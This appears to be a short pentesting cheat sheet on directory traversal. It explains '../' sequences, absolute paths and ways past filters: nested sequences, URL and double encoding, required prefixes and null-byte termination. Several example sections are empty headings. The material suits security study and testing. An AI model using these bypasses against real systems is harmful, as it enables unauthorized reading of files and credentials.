Directory traversal

A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.

-- Wikipedia


Traversal sequence (dot dot slash)

For each ../ you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.


Absolute path

Sometimes you can just supply an absolute path.


Bypass filters

Nested traversal sequences

When the traversal seqence is only stripped once and not recursively, you can use nested sequences, so that after stripping the inner one, there will still remain a traversal sequence, so ....// becomes ../.


URL encoding

Single URL encoding


Double URL encoding (the %-char is also encoding, as %25)


Non-standard encodings


Mandatory prefix

If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.


Null byte termination

E.g. if the app checks for certain file extensions, you may be able to bypass the filter, by supplying a null byte %00 and therefore termine the string early.


Last updated